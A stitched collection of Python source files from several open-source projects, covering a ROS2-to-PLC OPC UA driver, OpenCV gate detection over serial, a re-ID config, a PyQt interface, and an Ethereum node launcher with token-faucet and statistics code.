from rclpy.node import Node
class DriverSender(Node):
"""This class controls the PLC's SM transition by pressing buttons on the GUI."""
def __init__(self):
super().__init__('driver_sender')
self.srv = self.create_service(Transition, 'transition', self.trans_request)
self.client = Client('opc.tcp://192.168.125.2:4840/freeopcua/server/')
def connect(self):
self.client.connect()
def __exit__(self, exc_type, exc_val, exc_tb):
self.client.disconnect()
def trans_request(self, req, res):
command_rtn = False
command_valid = True
command_int = req.command
print('Evaluating transition request command: ' + str(command_int))
try:
if command_int == 5:
cmd_abort = self.client.get_node('ns=3;' +
's=\"PackML_Status\".\"EM00\"' +
'.\"Unit\".\"Cmd_Abort\"')
cmd_abort.set_attribute(ua.AttributeIds.Value, ua.DataValue(True))
time.sleep(0.1)
print('Sending Abort Command . . .')
command_rtn = True
elif command_int == 7:
cmd_stop = self.client.get_node('ns=3;' +
's=\"PackML_Status\".\"EM00\".' +
'\"Unit\".\"Cmd_Stop\""')
cmd_stop.set_attribute(ua.AttributeIds.Value, ua.DataValue(True))
time.sleep(0.1)
print('Sending Stop Command . . .')
command_rtn = True
elif command_int == 1:
cmd_clear = self.client.get_node('ns=3;' +
's=\"PackML_Status\".\"EM00\".' +
'\"Unit\".\"Cmd_Clear\"')
cmd_clear.set_attribute(ua.AttributeIds.Value, ua.DataValue(True))
time.sleep(0.1)
print('Sending Clear Command . . .')
command_rtn = True
elif command_int == 4:
cmd_hold = self.client.get_node('ns=3;' +
's=\"PackML_Status\".\"EM00\".' +
'\"Unit\".\"Cmd_Hold\"')
cmd_hold.set_attribute(ua.AttributeIds.Value, ua.DataValue(True))
time.sleep(0.1)
print('Sending Hold Command . . .')
command_rtn = True
elif command_int == 6:
cmd_reset = self.client.get_node('ns=3;' +
's=\"PackML_Status\".\"EM00\".' +
'\"Unit\".\"Cmd_Reset\"')
cmd_reset.set_attribute(ua.AttributeIds.Value, ua.DataValue(True))
time.sleep(0.1)
print('Sending Reset Command . . .')
command_rtn = True
elif command_int == 2:
cmd_start = self.client.get_node('ns=3;' +
's=\"PackML_Status\".\"EM00\".' +
'\"Unit\".\"Cmd_Start\"')
cmd_start.set_attribute(ua.AttributeIds.Value, ua.DataValue(True))
time.sleep(0.1)
print('Sending Start Command . . .')
command_rtn = True
elif command_int == 3:
cmd_stop = self.client.get_node('ns=3;' +
's=\"PackML_Status\".\"EM00\".' +
'\"Unit\".\"Cmd_Stop\"')
cmd_stop.set_attribute(ua.AttributeIds.Value, ua.DataValue(True))
time.sleep(0.05)
print('Sending Stop Command . . .')
command_rtn = True
elif command_int == 100:
cmd_suspend = self.client.get_node('ns=3;' +
's=\"PackML_Status\".\"EM00\".' +
'\"Unit\".\"Cmd_Suspend\"')
cmd_suspend.set_attribute(ua.AttributeIds.Value, ua.DataValue(True))
time.sleep(0.1)
print('Sending Suspend Command . . .')
command_rtn = True
elif command_int == 102:
cmd_unhold = self.client.get_node('ns=3;' +
's=\"PackML_Status\".\"EM00\".' +
'\"Unit\".\"Cmd_Unhold\"')
cmd_unhold.set_attribute(ua.AttributeIds.Value, ua.DataValue(True))
time.sleep(0.1)
print('Sending Unhold Command . . .')
command_rtn = True
elif command_int == 101:
cmd_unsuspend = self.client.get_node('ns=3;' +
's=\"PackML_Status\".\"EM00\".' +
'\"Unit\".\"Cmd_Unsuspend\"')
cmd_unsuspend.set_attribute(ua.AttributeIds.Value, ua.DataValue(True))
time.sleep(0.1)
print('Sending Unsuspend Command . . .')
command_rtn = True
else:
command_valid = False
except KeyboardInterrupt:
pass
if command_valid:
if command_rtn:
print('Successful transition request command: ' + str(command_int))
res.success = True
res.error_code = res.SUCCESS
else:
res.success = False
res.error_code = res.INVALID_TRANSITION_REQUEST
else:
res.success = False
res.error_code = res.UNRECGONIZED_REQUEST
return res
def main(args=None):
rclpy.init(args=args)
driver_sender = DriverSender()
driver_sender.connect()
rclpy.spin(driver_sender)
if __name__ == '__main__':
main()
```
#### File: packml_plc/test/test_packml_plc_listener.py
```python
import threading
import unittest
from unittest.mock import MagicMock
from packml_msgs.srv import AllStatus
from packml_plc.packml_plc_listener import DriverListener
from packml_plc.packml_plc_listener import HelloClient
from packml_plc.packml_plc_listener import main
from packml_plc.packml_plc_listener import newvals, thee
from packml_plc.packml_plc_listener import plc_listener
import rclpy
class TestMethods(unittest.TestCase):
def test_helloclient(self):
client = HelloClient('freeopcua/server/')
client.client.connect = MagicMock()
client.client.disconnect = MagicMock()
client.__enter__()
client.__exit__(1, 1, 1)
def test_driverlistener(self):
rclpy.init(args=None)
driver = DriverListener()
driver.create_service = MagicMock()
self.assertNotEqual(driver.srv, [])
res = AllStatus.Response()
driver.send_data(0, res)
self.assertNotEqual(res, [])
rclpy.shutdown()
def test_plclistener(self):
HelloClient.__enter__ = MagicMock()
HelloClient.__exit__ = MagicMock()
e = threading.Event()
listener = threading.Timer(1.0, plc_listener, args=(e,))
listener.start()
listener.join(5)
e.set()
self.assertEqual(newvals, [False, False, False, False, False, False,
False, False, False, False, False, False,
False, False, False, False, False])
def test_main(self):
rclpy.spin = MagicMock()
main()
thee.set()
``` |
{
"source": "1487quantum/Ray-X",
"score": 2
} |
#### File: Ray-X/cv3/gatedetectPy3_serial.py
```python
import numpy as np
import cv2
import math
import serial
import time
# configure the serial connections (the parameters differs on the device you are connecting to)
ser = serial.Serial(
port='/dev/ttyACM0',
baudrate=9600,
parity=serial.PARITY_ODD,
stopbits=serial.STOPBITS_TWO,
bytesize=serial.SEVENBITS
)
ser.isOpen()
#cap = cv2.VideoCapture('s.mp4')
cap = cv2.VideoCapture(0)
#Vid
vidScale = 0.5 #Img scale ratio
roiS = 0.25 #ROI start (x-axis)
roiE = 0.75 #ROI end (x-axis)
#Viz
vizClr = (255,255,255)
#Target cross param
cl = 10 #Cross length
crts = 0.5 #Cross ratio to image size
#Centre of gate
gc = 0
#List of Steer
lstS = []
d=0 #Counter for lstS
#Save vid out param
#fourcc = cv2.VideoWriter_fourcc(*'MJPG')
#out = cv2.VideoWriter('test.avi', fourcc, 10, (640, 360),True) #Out, codec, fps, res, use 3 clr channel bool
def main():
while 1:
ret, img = cap.read()
img = cv2.resize(img, (0,0), fx=vidScale, fy=vidScale)
height, width = img.shape[:2] #Get Height, width of img
#Set ROI start end loc
rS = int(roiS*width)
rE = int(roiE*width)
#Set target cross w & h
cw = int(crts*width)
ch = int(crts*height)
#Set the center of gate to be in the middle initially/if all fails
gc=int(width/2)
#Change to HSV colorspace
hsv_image = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
h, s, v = cv2.split(hsv_image)
#Visualisation
#Draw line overlay boundary for visualisation
cv2.line(img, (rS, int(height/3)), (rS, int(2*height/3)), vizClr, 2, cv2.LINE_AA) #x1,y1,x2,y2
cv2.line(img, (rE, int(height/3)), (rE, int(2*height/3)), vizClr, 2, cv2.LINE_AA)
#Target Cross
cv2.line(img, (cw, ch-cl), (cw, ch+cl), vizClr, 1, cv2.LINE_AA)
cv2.line(img, (cw-cl, ch), (cw+cl, ch), vizClr, 1, cv2.LINE_AA)
#Make another copy of img
imgDebug=img.copy()
#Set ROI: roi = gray[y1:y2, x1:x2]
vr = v[0:height,rS:rE]
# noise removal
kernelN = np.ones((3,3),np.uint8)
opening = cv2.morphologyEx(vr,cv2.MORPH_OPEN,kernelN, iterations = 4)
#Erode and Enhance side bars (Emphasis kernel more on y-axis)
kernelS = np.ones((3,9), np.uint8)
img_es = cv2.erode(opening, kernelS, iterations=6)
#Median Blur to ensure connectivity
img_esB = cv2.medianBlur(img_es,15)
#Upper range threshold: Set value above 170 to 0 (Used lightness value via imshow of dilated img to determine cutoff)
th0, img_esBT = cv2.threshold(img_esB, 170, 0, cv2.THRESH_TRUNC)
#cv2.imshow("UpperT",img_esBT)
#Dilate img
kernelD = np.ones((7,7), np.uint8)
img_esBTD = cv2.dilate(img_esBT, kernelD, iterations=7)
#cv2.imshow("Dilate",img_esBTD)
#Now let's make it Binary: Binary thresholding (Set val below thres to max value)
th1, img_esBTD = cv2.threshold(img_esBTD, 165, 255, cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)
#cv2.imshow('Bin',img_esBTD)
#Erode again
kernelD = np.ones((1,1), np.uint8)
img_esBTDe = cv2.erode(img_esBTD, kernelD, iterations=2)
#cv2.imshow('Erode2',img_esBTDe)
_, contours, _ = cv2.findContours(img_esBTDe,cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
ctrList=[None]*len(contours) #Initialise with NoneType, Get list of center loc of only X-axis
l=0 #mntList Tracker
for k, c in enumerate(contours):
area = cv2.contourArea(c)
if (area > 700)and(area < 20000):
# compute the center of the contour
M = cv2.moments(c)
cX = int(M["m10"] / M["m00"])
cY = int(M["m01"] / M["m00"])
ctrList[l]=cX
#Debug Image
#Draw the contour and center of the shape on the image (+rS to Compensate ROI x-axis offset)
cv2.drawContours(imgDebug, [c], -1, (255, 0, 0), 2, offset=(rS,0))
cv2.circle(imgDebug, (rS+cX, cY), 5, vizClr, -1)
cv2.putText(imgDebug, "Center", (rS+cX - 20, cY - 20),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, vizClr, 1)
l+=1
#ctrList = filter(lambda x: x is not None, ctrList)
ctrList = [x for x in ctrList if x is not None] #Remove nonetype
#print(ctrList)
#Check whether point is within ROI
for z in ctrList:
if not((rS+cX>rS)and(rS+cX<rE)):
ctrList.remove(z)
#print ctrList
#print(ctrList)
if len(ctrList)>1:
gc=sum(ctrList)/len(ctrList)
elif len(ctrList)!=0:
gc=ctrList[0]
if not ctrList: #If empty
gc=width/2-rS #Remove double offset
#print gc
lstS.append(gc) #Add to list to calculate moving average of steer to use
#Take moving average of 10 value to smooth gate centre
tmpAvg = running_mean(lstS,10)
if len(tmpAvg)>0:
mavg = int(tmpAvg[len(tmpAvg)-1])
else:
mavg=int(width/2)
#Motion strength (Range: +/-0<->100), Right-> blue, left -> red
#Raw
diffRC =width/2-(rS+gc) #Diff from center & target
diffRR = int(100*(float(diffRC)/((rS-rE)/2))) #Get strength ratio to be applied
#Smooth
diffSC =width/2-(rS+mavg) #Diff from center & target
diffSR = int(100*(float(diffSC)/((rS-rE)/2))) #Get strength ratio to be applied
#Viz
#Draw smooth target line (Have to compensate for ROI x-axis offset)
cv2.line(img, (rS+mavg, int(height/3)), (rS+mavg, int(2*height/3)), (100, 255, 0), 2, cv2.LINE_AA) #x1,y1,x2,y2
cv2.putText(img, "Steer: "+str(diffSR), (rS, 70+int(2*height/3)), cv2.FONT_HERSHEY_SIMPLEX, 0.5, vizClr, 1) #Show smoothed target as final
#print diffR
#Draw gauge below
if (diffSC>0): #Right
cv2.line(img, (int(rS+mavg), 20+int(2*height/3)), (int(width/2), 20+int(2*height/3)), (0, 0, 255), 3, cv2.LINE_AA) #x1,y1,x2,y2
else: #Left
cv2.line(img, (int(rS+mavg), 20+int(2*height/3)), (int(width/2), 20+int(2*height/3)), (255, 0, 0), 3, cv2.LINE_AA) #x1,y1,x2,y2
#For Debug
cv2.putText(imgDebug, "Steer (R): "+str(diffRR), (rS, 40+int(2*height/3)), cv2.FONT_HERSHEY_SIMPLEX, 0.5, vizClr, 1)
cv2.putText(imgDebug, "Steer (S): "+str(diffSR), (rS, 70+int(2*height/3)), cv2.FONT_HERSHEY_SIMPLEX, 0.5, vizClr, 1)
#Target line
#Draw raw target line (Have to compensate for ROI x-axis offset)
cv2.line(imgDebug, (int(rS+gc), int(height/3)), (int(rS+gc), int(2*height/3)), (0, 100, 255), 2, cv2.LINE_AA) #x1,y1,x2,y2
cv2.putText(imgDebug, "T-Raw", (int(rS+gc) - 20, int(height/3) - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, vizClr, 1)
#Draw smooth target line (Have to compensate for ROI x-axis offset)
cv2.line(imgDebug, (rS+mavg, int(height/3)), (rS+mavg, int(2*height/3)), (100, 255, 0), 2, cv2.LINE_AA) #x1,y1,x2,y2
cv2.putText(imgDebug, "T-Smooth", (rS+mavg - 20, int(2*height/3) + 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, vizClr, 1)
#print ctrList,gc
mavgOut = int((diffSR+100)/22)
print(mavgOut)
ser.write(bytes([mavgOut])) #Need convert int to byte, current format foy py3 only
time.sleep(0.5) # with the port open, the response will be buffered
# so wait a bit longer for response here
#cv2.imshow('Main',img)
#cv2.imshow('Debug',imgDebug)
cv2.imwrite("/home/odroid/Desktop/q.jpg",imgDebug)
#out.write(imgDebug) #Save main img frame
#cv2.imshow('Edges',edges)
#sfc = cv2.waitKey(0)
k = cv2.waitKey(30) & 0xff
if k == 27:
break
cap.release()
out.release()
cv2.destroyAllWindows()
ser.close()
def running_mean(x, N):
cumsum = np.cumsum(np.insert(x, 0, 0))
return (cumsum[N:] - cumsum[:-N]) / float(N)
if __name__ == "__main__":
main()
``` |
{
"source": "1490780232/competition",
"score": 2
} |
#### File: competition/config/configs.py
```python
from .default import DefaultConfig
class Config(DefaultConfig):
def __init__(self):
super(Config, self).__init__()
self.CFG_NAME = 'baseline'
self.COMBINE_DATASET=True
self.DATA_DIR = '/home/lzy/lzy/data/' #"market1501/Market-1501-v15.09.15"
self.PRETRAIN_CHOICE = 'imagenet'
self.PRETRAIN_PATH = '/home/lzy/.cache/torch/checkpoints/resnet50-19c8e357.pth'
self.LOG_DIR = "./log/pytorch1.7_bs_128_all_data" # log directory
self.OUTPUT_DIR = "./output_cuda10.1_bs_128_all_data" # saved model directory
self.LOSS_TYPE = 'triplet+softmax+center'
self.TEST_WEIGHT = './output_cuda10.1/resnet50_185.pth'
self.FLIP_FEATS = 'off'
self.HARD_FACTOR = 0.2
self.RERANKING = False #True
self.EVAL_PERIOD = 5 # validation period
self.CHECKPOINT_PERIOD = 20 # saving model period
``` |
{
"source": "1490780232/ocr_digital",
"score": 2
} |
#### File: ocr_digital/View/ui_main.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(815, 400)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayoutWidget = QtWidgets.QWidget(self.centralwidget)
self.gridLayoutWidget.setGeometry(QtCore.QRect(0, 0, 801, 333))
self.gridLayoutWidget.setObjectName("gridLayoutWidget")
self.gridLayout = QtWidgets.QGridLayout(self.gridLayoutWidget)
self.gridLayout.setContentsMargins(0, 0, 0, 0)
self.gridLayout.setObjectName("gridLayout")
self.label_4 = QtWidgets.QLabel(self.gridLayoutWidget)
self.label_4.setObjectName("label_4")
self.gridLayout.addWidget(self.label_4, 3, 2, 1, 1)
self.label = QtWidgets.QLabel(self.gridLayoutWidget)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
self.savepath_browser = QtWidgets.QTextBrowser(self.gridLayoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.savepath_browser.sizePolicy().hasHeightForWidth())
self.savepath_browser.setSizePolicy(sizePolicy)
self.savepath_browser.setObjectName("savepath_browser")
self.gridLayout.addWidget(self.savepath_browser, 1, 1, 1, 1)
self.label_2 = QtWidgets.QLabel(self.gridLayoutWidget)
self.label_2.setObjectName("label_2")
self.gridLayout.addWidget(self.label_2, 1, 0, 1, 1)
self.videopath_browser = QtWidgets.QTextBrowser(self.gridLayoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.videopath_browser.sizePolicy().hasHeightForWidth())
self.videopath_browser.setSizePolicy(sizePolicy)
self.videopath_browser.setMaximumSize(QtCore.QSize(16777213, 16777215))
self.videopath_browser.setObjectName("videopath_browser")
self.gridLayout.addWidget(self.videopath_browser, 0, 1, 1, 1)
self.label_3 = QtWidgets.QLabel(self.gridLayoutWidget)
self.label_3.setObjectName("label_3")
self.gridLayout.addWidget(self.label_3, 2, 0, 1, 1)
self.data_count = QtWidgets.QLabel(self.gridLayoutWidget)
self.data_count.setObjectName("data_count")
self.gridLayout.addWidget(self.data_count, 2, 1, 1, 1)
self.saved2path = QtWidgets.QLabel(self.gridLayoutWidget)
self.saved2path.setObjectName("saved2path")
self.gridLayout.addWidget(self.saved2path, 3, 0, 1, 2)
self.run_buttom = QtWidgets.QPushButton(self.gridLayoutWidget)
self.run_buttom.setObjectName("run_buttom")
self.gridLayout.addWidget(self.run_buttom, 4, 1, 1, 1)
self.skipped_browser = QtWidgets.QTextBrowser(self.gridLayoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.skipped_browser.sizePolicy().hasHeightForWidth())
self.skipped_browser.setSizePolicy(sizePolicy)
self.skipped_browser.setObjectName("skipped_browser")
self.gridLayout.addWidget(self.skipped_browser, 3, 3, 1, 1)
self.video_pushButton = QtWidgets.QPushButton(self.gridLayoutWidget)
self.video_pushButton.setObjectName("video_pushButton")
self.gridLayout.addWidget(self.video_pushButton, 0, 2, 1, 2)
self.savepath_pushButton = QtWidgets.QPushButton(self.gridLayoutWidget)
self.savepath_pushButton.setObjectName("savepath_pushButton")
self.gridLayout.addWidget(self.savepath_pushButton, 1, 2, 1, 2)
self.unit_comboBox = QtWidgets.QComboBox(self.gridLayoutWidget)
self.unit_comboBox.setObjectName("unit_comboBox")
self.unit_comboBox.addItem("")
self.unit_comboBox.addItem("")
self.gridLayout.addWidget(self.unit_comboBox, 2, 2, 1, 2)
self.checkout_pushButton = QtWidgets.QPushButton(self.gridLayoutWidget)
self.checkout_pushButton.setObjectName("checkout_pushButton")
self.gridLayout.addWidget(self.checkout_pushButton, 4, 2, 1, 2)
self.log_field = QtWidgets.QLabel(self.gridLayoutWidget)
self.log_field.setObjectName("log_field")
self.gridLayout.addWidget(self.log_field, 5, 0, 1, 4)
self.gridLayout.setColumnStretch(0, 3)
self.gridLayout.setColumnStretch(1, 30)
self.gridLayout.setColumnStretch(2, 1)
self.gridLayout.setColumnStretch(3, 10)
self.gridLayout.setRowStretch(0, 1)
self.gridLayout.setRowStretch(1, 1)
self.gridLayout.setRowStretch(2, 1)
self.gridLayout.setRowStretch(3, 1)
self.gridLayout.setRowStretch(4, 1)
self.gridLayout.setRowStretch(5, 20)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 815, 22))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.toolBar = QtWidgets.QToolBar(MainWindow)
self.toolBar.setObjectName("toolBar")
MainWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.toolBar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.label_4.setText(_translate("MainWindow", "跳帧数"))
self.label.setText(_translate("MainWindow", "视频地址"))
self.label_2.setText(_translate("MainWindow", "保存地址"))
self.label_3.setText(_translate("MainWindow", "共提取"))
self.data_count.setText(_translate("MainWindow", "{}个数据"))
self.saved2path.setText(_translate("MainWindow", "保存至"))
self.run_buttom.setText(_translate("MainWindow", "RUN"))
self.skipped_browser.setHtml(_translate("MainWindow", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Sans Serif\'; font-size:9pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">10</p></body></html>"))
self.video_pushButton.setText(_translate("MainWindow", "Browse..."))
self.savepath_pushButton.setText(_translate("MainWindow", "Browse..."))
self.unit_comboBox.setItemText(0, _translate("MainWindow", "有单位"))
self.unit_comboBox.setItemText(1, _translate("MainWindow", "无单位"))
self.checkout_pushButton.setText(_translate("MainWindow", "Checkout"))
self.log_field.setText(_translate("MainWindow", "TextLabel"))
self.toolBar.setWindowTitle(_translate("MainWindow", "toolBar"))
``` |
{
"source": "14avengers/sentinel",
"score": 2
} |
#### File: sentinel/nodes/node.py
```python
import os
import subprocess
from .. import Config
from ..utils.string import generate_random_name
class Node:
def __init__(self, config=None, console=False, etherbase=None, identity=None,
miner=False, v5=False, rpc=True, verbosity=3):
if miner == True and etherbase == None:
raise ValueError('Etherbase shouldn\'t be `None` when mining is `True`')
self.config = Config() if config == None else config
self.geth_cmd = [
'geth',
'--datadir', self.config.SENTINEL_DATA_PATH
]
self.console = console
self.miner = miner
self.etherbase = etherbase
self.identity = generate_random_name() if identity == None else identity
self.v5 = v5
self.rpc = rpc
self.verbosity = verbosity
def init(self):
args = [ 'init', self.config.GENESIS_FILE ]
init_proc = subprocess.Popen(self.geth_cmd + args, shell=False)
init_proc.wait()
if init_proc.returncode != 0:
raise OSError('Failed to init geth :-(')
def start(self):
args = [
'--identity', self.identity,
'--networkid', self.config.NETWORK_ID,
'--bootnodes', self.config.BOOTNODE_URL,
'--verbosity', str(self.verbosity)
]
if self.rpc == True:
args += [
'--rpc',
'--rpcaddr=0.0.0.0',
'--rpcapi="{}"'.format(self.config.RPC_APIS)
]
if self.v5 == True:
args += [ '--v5disc' ]
if self.miner == True and self.etherbase != None:
args += [
'--mine',
'--etherbase', self.etherbase
]
if self.console == True:
args += [ 'console' ]
geth_proc = subprocess.Popen(self.geth_cmd + args, shell=False)
geth_proc.wait()
if geth_proc.returncode != 0:
raise OSError('Failed to start geth node :-(')
```
#### File: sentinel/utils/string.py
```python
import string
import random
def generate_random_name(length=8):
return ''.join(random.choice(string.ascii_uppercase) for _ in range(length))
```
#### File: sentinel/dev/free.py
```python
import json
import falcon
from ..config import DECIMALS
from ..db import db
from ..helpers import eth_helper
def check_free(to_addr):
tx = db.free.find_one({
'to_addr': to_addr
})
return (tx is None) is False
def insert_free(to_addr):
_ = db.free.insert_one({
'to_addr': to_addr
})
class GetFreeAmount(object):
def on_post(self, req, resp):
account_addr = str(req.body['account_addr']).lower()
eths = int(0.25 * (10 ** 18))
sents = int(1000 * DECIMALS)
tx_done = check_free(account_addr)
if tx_done is True:
message = {
'success': False,
'message': 'Test Tokens already claimed'
}
else:
errors, tx_hashes = eth_helper.free(account_addr, eths, sents)
if len(errors) > 0:
message = {
'success': False,
'errors': errors,
'tx_hashes': tx_hashes,
'message': 'Error occurred while transferring free amount.'
}
else:
insert_free(account_addr)
message = {
'success': True,
'errors': errors,
'tx_hashes': tx_hashes,
'message': 'Successfully transferred Test Tokens'
}
resp.status = falcon.HTTP_200
resp.body = json.dumps(message)
```
#### File: sentinel/jobs/statistics.py
```python
import datetime
import time
from _thread import start_new_thread
from ..db import db
class DailyActiveNodes(object):
def __init__(self, hour=0, minute=0):
self.hour = hour
self.minute = minute
self.stop_thread = False
self.t = None
def thread(self):
while self.stop_thread is False:
current_time = datetime.datetime.now()
if (current_time.hour == self.hour) and (current_time.minute == self.minute):
nodes = {
'up': db.nodes.find({'vpn.status': 'up'}).count(),
'total': db.nodes.find().count()
}
current_time = datetime.datetime.combine(current_time, datetime.time(0))
timestamp = int(time.mktime(current_time.timetuple()))
_ = db.statistics.update({
'timestamp': timestamp
}, {
'$set': {
'nodes': nodes
}
}, upsert=True)
time.sleep(45)
def start(self):
if self.t is None:
self.t = start_new_thread(self.thread, ())
def stop(self):
self.stop_thread = True
```
#### File: sentinel/utils/middlewares.py
```python
import json
class JSONTranslator(object):
def process_request(self, req, resp):
body = req.stream.read()
try:
req.body = json.loads(body.decode('utf-8'))
except ValueError:
_ = {
'message': 'Malformed JSON',
'errors': ['JSON was incorrect or not encoded as UTF-8.']
}
``` |
{
"source": "14bmkelley/raytracer-python",
"score": 3
} |
#### File: 14bmkelley/raytracer-python/collisions.py
```python
import math
from vector_math import *
def sphere_intersection_point(ray, sphere):
origin_diff = difference_point(ray.pt, sphere.center)
A = dot_vector(ray.dir, ray.dir)
B = dot_vector(scale_vector(origin_diff, 2), ray.dir)
C = dot_vector(origin_diff, origin_diff) - sphere.radius ** 2
determinant = B ** 2 - 4 * A * C
def get_point_from_root(t):
return translate_point(ray.pt, scale_vector(ray.dir, t))
if determinant >= 0:
root1 = (-B + math.sqrt(determinant)) / (2.0 * A)
root2 = (-B - math.sqrt(determinant)) / (2.0 * A)
if root1 >= 0 and root2 >= 0:
if root1 == root2:
return get_point_from_root(root1)
else:
if root1 < root2:
return get_point_from_root(root1)
else:
return get_point_from_root(root2)
elif root1 >= 0 or root2 >= 0:
if root1 >= 0:
return get_point_from_root(root1)
else:
return get_point_from_root(root2)
else:
return None
else:
return None
def find_intersection_points(sphere_list, ray):
return [(sphere, sphere_intersection_point(ray, sphere)) for sphere in sphere_list if sphere_intersection_point(ray, sphere) != None]
def sphere_normal_at_point(sphere, point):
return normalize_vector(vector_from_to(sphere.center, point))
```
#### File: 14bmkelley/raytracer-python/ray_caster.py
```python
from sys import argv, stdout
from data import Point, Color, Finish, Sphere
from commandline import get_eye_point, get_view, get_light, get_ambient
from cast import cast_all_rays
def main():
sphere_list = []
#try to open file or throw error
try:
input_file = open(argv[1], "r")
except:
print "Error: Filename not correctly specified"
print "Usage: python ray_caster.py # [-eye x y z] [-view min_x max_x min_y max_y width height"
exit()
#try to instantiate spheres from argv inputs or throw error
line_count = 0
for line in input_file:
line_count += 1
try:
params = line.split()
x = float(params[0])
y = float(params[1])
z = float(params[2])
rad = float(params[3])
r = float(params[4])
g = float(params[5])
b = float(params[6])
amb = float(params[7])
diff = float(params[8])
spec = float(params[9])
rough = float(params[10])
sphere = Sphere(Point(x, y, z), rad, Color(r, g, b), Finish(amb, diff, spec, rough))
sphere_list.append(sphere)
except:
print "malformed sphere on line {0} ... skipping".format(str(line_count))
#initialize casting variables relative to argv inputs
eye_point = get_eye_point(argv)
view = get_view(argv)
light = get_light(argv)
ambient = get_ambient(argv)
#write to image.ppm output image
file = open("image.ppm", "w")
file.write("P3\n")
file.write("{0} {1}\n".format(str(view.width), str(view.height)))
file.write("{0}\n".format(str(255)))
cast_all_rays(view, eye_point, sphere_list, ambient, light, file)
file.close()
if __name__ == "__main__":
main()
``` |
{
"source": "14es93/shellfunction",
"score": 3
} |
#### File: shellfunction/tests/test_core.py
```python
import shellfuncs
def test_basic_import():
"""
Test basic import functionality
"""
from .input_scripts.foo import bar
returncode, stdout, stderr = bar('STDOUT', 'STDERR')
assert returncode == 0
assert stdout == b'STDOUT\n'
assert stderr == b'STDERR\n'
def test_shell_config():
"""
Test configuring shell
"""
with shellfuncs.config(shell='/bin/bash'):
from .input_scripts.config import used_shell
_, stdout, _ = used_shell()
assert stdout == b'/bin/bash\n'
_, stdout, _ = used_shell(shell='/bin/sh')
assert stdout == b'/bin/sh\n'
``` |
{
"source": "14gaby14/sharedgames",
"score": 2
} |
#### File: website/sharedgames/views.py
```python
from django.shortcuts import render
from django.http import HttpResponse
def index(request):
return HttpResponse("This should be the shared games index.")
def detail(request, group_id):
return HttpResponse("The code is %s." % group_id)
def example(request):
return HttpResponse("This is an example")
``` |
{
"source": "14gollaher/Tango-Release",
"score": 3
} |
#### File: tango/TangoComponents/TangoRepository.py
```python
import os
import json
from TangoUserApplication import *
class TangoRepository:
def __init__(self):
self.directory = os.path.dirname(__file__)
self.filePath = os.path.join(self.directory, 'tango-pages.json')
def upsert_tango_pages(self, new_tango_pages):
with open(self.filePath, 'w') as filePath:
json.dump(new_tango_pages, filePath)
def upsert_tango_page(self, new_tango_page):
tango_pages = self.get_tango_pages()
page_exists = False
for i in range(len(tango_pages)):
if tango_pages[i]['view_name'] == new_tango_page['view_name']:
tango_pages[i] = new_tango_page
page_exists = True
if not page_exists: tango_pages.append(new_tango_page)
self.upsert_tango_pages(tango_pages)
def get_tango_pages(self):
with open(self.filePath, 'r') as filePath:
return json.load(filePath)
def get_tango_page(self, view_name):
for tango_page in self.get_tango_pages():
if tango_page['view_name'] == view_name: return tango_page
tango_page = {}
tango_page['view_name'] = view_name
tango_page['cases'] = []
tangoUserApplication = TangoUserApplication()
tango_page['fields'] = tangoUserApplication.get_fields(view_name)
return tango_page
def update_field_selector(self, view_name, field_name, new_selector):
fields = self.get_tango_page(view_name)['fields']
for field in fields:
if field['name'] == field_name: field['selector'] = new_selector
tango_page['fields'] = fields
self.upsert_tango_page(tango_page)
``` |
{
"source": "14H034160212/deeplogic",
"score": 3
} |
#### File: 14H034160212/deeplogic/gen_logic.py
```python
import argparse
import random as R
# Symbol Pool
CONST_SYMBOLS = "abcdefghijklmnopqrstuvwxyz"
VAR_SYMBOLS = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
PRED_SYMBOLS = "abcdefghijklmnopqrstuvwxyz"
EXTRA_SYMBOLS = "-,()"
CHARS = sorted(list(set(CONST_SYMBOLS+VAR_SYMBOLS+PRED_SYMBOLS+EXTRA_SYMBOLS)))
# Reserve 0 for padding
CHAR_IDX = dict((c, i+1) for i, c in enumerate(CHARS))
